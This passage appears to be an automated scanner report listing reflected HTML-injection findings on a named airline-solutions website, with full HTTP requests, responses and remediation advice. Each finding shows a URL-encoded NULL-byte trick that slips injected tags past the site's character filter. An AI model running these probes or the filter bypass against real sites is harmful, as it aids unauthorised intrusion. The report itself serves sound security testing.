GET /home/business_issues/other_airline_issues?%00f61d7<a>7f1e076aefd=1 HTTP/1.1
Host: www.sabreairlinesolutions.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.sabreairlinesolutions.com/home/about/sitemap/
Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286295079.1; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286321529; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A15%3A%22%2Fabout%2Fsitemap%2F%22%3Bi%3A1%3Bs%3A26%3A%22%2Fabout%2Fpage_not_found_404%2F%22%3Bi%3A2%3Bs%3A38%3A%22%2Fcontact%2Fproduct_support_and_services%2F%22%3Bi%3A3%3Bs%3A18%3A%22%2Fascend%2Fsubscribe%2F%22%3Bi%3A4%3Bs%3A36%3A%22%2Fabout%2Fexecutive_team%2Fellen_ehrlich%2F%22%3B%7D;

Response

HTTP/1.1 200 OK
Date: Wed, 06 Oct 2010 10:40:36 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Set-Cookie: exp_last_visit=1286321529; expires=Thu, 06-Oct-2011 10:40:38 GMT; path=/
Set-Cookie: exp_last_activity=1286379638; expires=Thu, 06-Oct-2011 10:40:38 GMT; path=/
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A38%3A%22%2Fbusiness_issues%2Fother_airline_issues%2F%22%3Bi%3A1%3Bs%3A15%3A%22%2Fabout%2Fsitemap%2F%22%3Bi%3A2%3Bs%3A26%3A%22%2Fabout%2Fpage_not_found_404%2F%22%3Bi%3A3%3Bs%3A38%3A%22%2Fcontact%2Fproduct_support_and_services%2F%22%3Bi%3A4%3Bs%3A18%3A%22%2Fascend%2Fsubscribe%2F%22%3B%7D; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Wed, 06 Oct 2010 10:40:50 GMT
Pragma: no-cache
Content-Length: 6970
Connection: close
Content-Type: text/html


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Conten
...[SNIP]...
<a>7f1e076aefd=1">other airline issues?%00f61d7<a>7f1e076aefd=1</a>
...[SNIP]...

3.48. http://www.sabreairlinesolutions.com/home/business_issues/other_airline_issues/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.sabreairlinesolutions.com
Path:   /home/business_issues/other_airline_issues/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload %00ad915<a>d7416594ce8 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as ad915<a>d7416594ce8 in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /home/business_issues/other_airline_issues/?%00ad915<a>d7416594ce8=1 HTTP/1.1
Host: www.sabreairlinesolutions.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.sabreairlinesolutions.com/home/business_issues
Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286302664.1286304597.3; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286323238; __utmb=178985382.2.10.1286304597; exp_tracker=a%3A2%3A%7Bi%3A0%3Bs%3A8%3A%22%2Fascend%2F%22%3Bi%3A1%3Bs%3A36%3A%22%2F3%2Fefdc23b5379445c2a0d7c47043337670%2F%22%3B%7D;

Response

HTTP/1.1 200 OK
Date: Wed, 06 Oct 2010 10:46:40 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Set-Cookie: exp_last_visit=1286323238; expires=Thu, 06-Oct-2011 10:46:41 GMT; path=/
Set-Cookie: exp_last_activity=1286380000; expires=Thu, 06-Oct-2011 10:46:41 GMT; path=/
Set-Cookie: exp_tracker=a%3A3%3A%7Bi%3A0%3Bs%3A38%3A%22%2Fbusiness_issues%2Fother_airline_issues%2F%22%3Bi%3A1%3Bs%3A8%3A%22%2Fascend%2F%22%3Bi%3A2%3Bs%3A36%3A%22%2F3%2Fefdc23b5379445c2a0d7c47043337670%2F%22%3B%7D; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Wed, 06 Oct 2010 10:47:03 GMT
Pragma: no-cache
Content-Length: 7034
Connection: close
Content-Type: text/html


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Conten
...[SNIP]...
<a>d7416594ce8=1">?%00ad915<a>d7416594ce8=1</a>
...[SNIP]...

3.49. http://www.sabreairlinesolutions.com/home/business_issues/other_airline_issues/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.sabreairlinesolutions.com
Path:   /home/business_issues/other_airline_issues/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %00fe03e"><a>5df3cb060b1 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as fe03e"><a>5df3cb060b1 in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /home/business_issues/other_airline_issues/?%00fe03e"><a>5df3cb060b1=1 HTTP/1.1
Host: www.sabreairlinesolutions.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.sabreairlinesolutions.com/home/business_issues
Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286302664.1286304597.3; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286323238; __utmb=178985382.2.10.1286304597; exp_tracker=a%3A2%3A%7Bi%3A0%3Bs%3A8%3A%22%2Fascend%2F%22%3Bi%3A1%3Bs%3A36%3A%22%2F3%2Fefdc23b5379445c2a0d7c47043337670%2F%22%3B%7D;

Response

HTTP/1.1 200 OK
Date: Wed, 06 Oct 2010 10:42:12 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Set-Cookie: exp_last_visit=1286323238; expires=Thu, 06-Oct-2011 10:42:15 GMT; path=/
Set-Cookie: exp_last_activity=1286379734; expires=Thu, 06-Oct-2011 10:42:15 GMT; path=/
Set-Cookie: exp_tracker=a%3A3%3A%7Bi%3A0%3Bs%3A38%3A%22%2Fbusiness_issues%2Fother_airline_issues%2F%22%3Bi%3A1%3Bs%3A8%3A%22%2Fascend%2F%22%3Bi%3A2%3Bs%3A36%3A%22%2F3%2Fefdc23b5379445c2a0d7c47043337670%2F%22%3B%7D; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Wed, 06 Oct 2010 10:42:36 GMT
Pragma: no-cache
Content-Length: 7038
Connection: close
Content-Type: text/html


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Conten
...[SNIP]...
<a href="/home/business_issues/other_airline_issues/?%00fe03e"><a>5df3cb060b1=1">
...[SNIP]...

3.50. http://www.sabreairlinesolutions.com/home/business_issues/revenue_growth [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.sabreairlinesolutions.com
Path:   /home/business_issues/revenue_growth

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload %00ddcb8<a>b66fa2a9b31 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as ddcb8<a>b66fa2a9b31 in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /home/business_issues/revenue_growth?%00ddcb8<a>b66fa2a9b31=1 HTTP/1.1
Host: www.sabreairlinesolutions.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.sabreairlinesolutions.com/home/about/sitemap/
Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286295079.1; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286321583; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A20%3A%22%2Fnews_events%2Fevents%2F%22%3Bi%3A1%3Bs%3A7%3A%22%2Fabout%2F%22%3Bi%3A2%3Bs%3A26%3A%22%2Fabout%2Fpage_not_found_404%2F%22%3Bi%3A3%3Bs%3A38%3A%22%2Fcontact%2Fproduct_support_and_services%2F%22%3Bi%3A4%3Bs%3A18%3A%22%2Fascend%2Fsubscribe%2F%22%3B%7D;

Response

HTTP/1.1 200 OK
Date: Wed, 06 Oct 2010 10:30:02 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Set-Cookie: exp_last_visit=1286321583; expires=Thu, 06-Oct-2011 10:30:08 GMT; path=/
Set-Cookie: exp_last_activity=1286379008; expires=Thu, 06-Oct-2011 10:30:08 GMT; path=/
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A32%3A%22%2Fbusiness_issues%2Frevenue_growth%2F%22%3Bi%3A1%3Bs%3A20%3A%22%2Fnews_events%2Fevents%2F%22%3Bi%3A2%3Bs%3A7%3A%22%2Fabout%2F%22%3Bi%3A3%3Bs%3A26%3A%22%2Fabout%2Fpage_not_found_404%2F%22%3Bi%3A4%3Bs%3A38%3A%22%2Fcontact%2Fproduct_support_and_services%2F%22%3B%7D; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Wed, 06 Oct 2010 10:30:34 GMT
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 8216


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Conten
...[SNIP]...
<a>b66fa2a9b31=1">revenue growth?%00ddcb8<a>b66fa2a9b31=1</a>
...[SNIP]...

3.51. http://www.sabreairlinesolutions.com/home/business_issues/revenue_growth [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.sabreairlinesolutions.com
Path:   /home/business_issues/revenue_growth

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %00282cf"><a>70df90e6b20 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 282cf"><a>70df90e6b20 in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /home/business_issues/revenue_growth?%00282cf"><a>70df90e6b20=1 HTTP/1.1
Host: www.sabreairlinesolutions.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.sabreairlinesolutions.com/home/about/sitemap/
Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286295079.1; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286321583; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A20%3A%22%2Fnews_events%2Fevents%2F%22%3Bi%3A1%3Bs%3A7%3A%22%2Fabout%2F%22%3Bi%3A2%3Bs%3A26%3A%22%2Fabout%2Fpage_not_found_404%2F%22%3Bi%3A3%3Bs%3A38%3A%22%2Fcontact%2Fproduct_support_and_services%2F%22%3Bi%3A4%3Bs%3A18%3A%22%2Fascend%2Fsubscribe%2F%22%3B%7D;

Response

HTTP/1.1 200 OK
Date: Wed, 06 Oct 2010 10:26:14 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Set-Cookie: exp_last_visit=1286321583; expires=Thu, 06-Oct-2011 10:26:18 GMT; path=/
Set-Cookie: exp_last_activity=1286378778; expires=Thu, 06-Oct-2011 10:26:18 GMT; path=/
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A32%3A%22%2Fbusiness_issues%2Frevenue_growth%2F%22%3Bi%3A1%3Bs%3A20%3A%22%2Fnews_events%2Fevents%2F%22%3Bi%3A2%3Bs%3A7%3A%22%2Fabout%2F%22%3Bi%3A3%3Bs%3A26%3A%22%2Fabout%2Fpage_not_found_404%2F%22%3Bi%3A4%3Bs%3A38%3A%22%2Fcontact%2Fproduct_support_and_services%2F%22%3B%7D; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Wed, 06 Oct 2010 10:26:42 GMT
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 8220


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Conten
...[SNIP]...
<a href="/home/business_issues/revenue_growth?%00282cf"><a>70df90e6b20=1">
...[SNIP]...

3.52. http://www.sabreairlinesolutions.com/home/business_issues/revenue_growth/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.sabreairlinesolutions.com
Path:   /home/business_issues/revenue_growth/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %00dd32d"><a>ee461130351 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as dd32d"><a>ee461130351 in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /home/business_issues/revenue_growth/?%00dd32d"><a>ee461130351=1 HTTP/1.1
Host: www.sabreairlinesolutions.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.sabreairlinesolutions.com/home/business_issues
Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286295079.1; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286322245; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A30%3A%22%2Fproducts_services%2Ftechnology%2F%22%3Bi%3A1%3Bs%3A40%3A%22%2Fproducts_services%2Fairline_distribution%2F%22%3Bi%3A2%3Bs%3A63%3A%22%2Fproducts_services%2Fproduct%2Fsabre_aircentre_flight_plan_manager%2F%22%3Bi%3A3%3Bs%3A56%3A%22%2Fproducts_services%2Fproduct%2Fsabre_aircentre_crew_manager%2F%22%3Bi%3A4%3Bs%3A55%3A%22%2Fproducts_services%2Fproduct%2Fsabre_aircentre_staff_admin%2F%22%3B%7D;

Response

HTTP/1.1 200 OK
Date: Wed, 06 Oct 2010 10:50:08 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Set-Cookie: exp_last_visit=1286322245; expires=Thu, 06-Oct-2011 10:50:10 GMT; path=/
Set-Cookie: exp_last_activity=1286380210; expires=Thu, 06-Oct-2011 10:50:10 GMT; path=/
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A32%3A%22%2Fbusiness_issues%2Frevenue_growth%2F%22%3Bi%3A1%3Bs%3A30%3A%22%2Fproducts_services%2Ftechnology%2F%22%3Bi%3A2%3Bs%3A40%3A%22%2Fproducts_services%2Fairline_distribution%2F%22%3Bi%3A3%3Bs%3A63%3A%22%2Fproducts_services%2Fproduct%2Fsabre_aircentre_flight_plan_manager%2F%22%3Bi%3A4%3Bs%3A56%3A%22%2Fproducts_services%2Fproduct%2Fsabre_aircentre_crew_manager%2F%22%3B%7D; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Wed, 06 Oct 2010 10:50:23 GMT
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 8278


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Conten
...[SNIP]...
<a href="/home/business_issues/revenue_growth/?%00dd32d"><a>ee461130351=1">
...[SNIP]...

3.53. http://www.sabreairlinesolutions.com/home/business_issues/revenue_growth/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.sabreairlinesolutions.com
Path:   /home/business_issues/revenue_growth/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload %00cfc96<a>b6269248590 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as cfc96<a>b6269248590 in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /home/business_issues/revenue_growth/?%00cfc96<a>b6269248590=1 HTTP/1.1
Host: www.sabreairlinesolutions.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.sabreairlinesolutions.com/home/business_issues
Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286295079.1; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286322245; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A30%3A%22%2Fproducts_services%2Ftechnology%2F%22%3Bi%3A1%3Bs%3A40%3A%22%2Fproducts_services%2Fairline_distribution%2F%22%3Bi%3A2%3Bs%3A63%3A%22%2Fproducts_services%2Fproduct%2Fsabre_aircentre_flight_plan_manager%2F%22%3Bi%3A3%3Bs%3A56%3A%22%2Fproducts_services%2Fproduct%2Fsabre_aircentre_crew_manager%2F%22%3Bi%3A4%3Bs%3A55%3A%22%2Fproducts_services%2Fproduct%2Fsabre_aircentre_staff_admin%2F%22%3B%7D;

Response

HTTP/1.1 200 OK
Date: Wed, 06 Oct 2010 10:52:53 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Set-Cookie: exp_last_visit=1286322245; expires=Thu, 06-Oct-2011 10:52:54 GMT; path=/
Set-Cookie: exp_last_activity=1286380374; expires=Thu, 06-Oct-2011 10:52:54 GMT; path=/
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A32%3A%22%2Fbusiness_issues%2Frevenue_growth%2F%22%3Bi%3A1%3Bs%3A30%3A%22%2Fproducts_services%2Ftechnology%2F%22%3Bi%3A2%3Bs%3A40%3A%22%2Fproducts_services%2Fairline_distribution%2F%22%3Bi%3A3%3Bs%3A63%3A%22%2Fproducts_services%2Fproduct%2Fsabre_aircentre_flight_plan_manager%2F%22%3Bi%3A4%3Bs%3A56%3A%22%2Fproducts_services%2Fproduct%2Fsabre_aircentre_crew_manager%2F%22%3B%7D; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Wed, 06 Oct 2010 10:53:07 GMT
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 8274


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Conten
...[SNIP]...
<a>b6269248590=1">?%00cfc96<a>b6269248590=1</a>
...[SNIP]...

3.54. http://www.sabreairlinesolutions.com/home/contact [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.sabreairlinesolutions.com
Path:   /home/contact

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %002e1da"><a>9ac32faf577 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 2e1da"><a>9ac32faf577 in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /home/contact?%002e1da"><a>9ac32faf577=1 HTTP/1.1
Host: www.sabreairlinesolutions.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: exp_last_visit=970952799; exp_last_activity=1286312799; exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A5%3A%22index%22%3B%7D;

Response

HTTP/1.1 200 OK
Date: Tue, 05 Oct 2010 17:12:37 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Set-Cookie: exp_last_activity=1286316757; expires=Wed, 05-Oct-2011 17:12:37 GMT; path=/
Set-Cookie: exp_tracker=a%3A2%3A%7Bi%3A0%3Bs%3A9%3A%22%2Fcontact%2F%22%3Bi%3A1%3Bs%3A5%3A%22index%22%3B%7D; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Tue, 05 Oct 2010 17:12:48 GMT
Pragma: no-cache
Content-Length: 7147
Connection: close
Content-Type: text/html


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-
...[SNIP]...
<a href="/home/contact?%002e1da"><a>9ac32faf577=1">
...[SNIP]...

3.55. http://www.sabreairlinesolutions.com/home/contact/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.sabreairlinesolutions.com
Path:   /home/contact/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload %004f026<a>f0cf889536 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 4f026<a>f0cf889536 in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /home/contact/?%004f026<a>f0cf889536=1 HTTP/1.1
Host: www.sabreairlinesolutions.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.sabreairlinesolutions.com/home/about/sitemap/
Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286295079.1; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286321409; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A16%3A%22%2Fascend%2Farchive%2F%22%3Bi%3A1%3Bs%3A35%3A%22%2Fabout%2Fexecutive_team%2Fsanjay_nanda%2F%22%3Bi%3A2%3Bs%3A28%3A%22%2Fabout%2Fcomplete_the_picture%2F%22%3Bi%3A3%3Bs%3A26%3A%22%2Fabout%2Fpage_not_found_404%2F%22%3Bi%3A4%3Bs%3A19%3A%22%2Fnews_events%2Fevent%2F%22%3B%7D;

Response

HTTP/1.1 200 OK
Date: Wed, 06 Oct 2010 09:56:25 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Set-Cookie: exp_last_visit=1286321409; expires=Thu, 06-Oct-2011 09:56:39 GMT; path=/
Set-Cookie: exp_last_activity=1286376999; expires=Thu, 06-Oct-2011 09:56:39 GMT; path=/
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A9%3A%22%2Fcontact%2F%22%3Bi%3A1%3Bs%3A16%3A%22%2Fascend%2Farchive%2F%22%3Bi%3A2%3Bs%3A35%3A%22%2Fabout%2Fexecutive_team%2Fsanjay_nanda%2F%22%3Bi%3A3%3Bs%3A28%3A%22%2Fabout%2Fcomplete_the_picture%2F%22%3Bi%3A4%3Bs%3A26%3A%22%2Fabout%2Fpage_not_found_404%2F%22%3B%7D; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Wed, 06 Oct 2010 09:56:51 GMT
Pragma: no-cache
Content-Length: 7176
Connection: close
Content-Type: text/html


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-
...[SNIP]...
<a>f0cf889536=1">?%004f026<a>f0cf889536=1</a>
...[SNIP]...

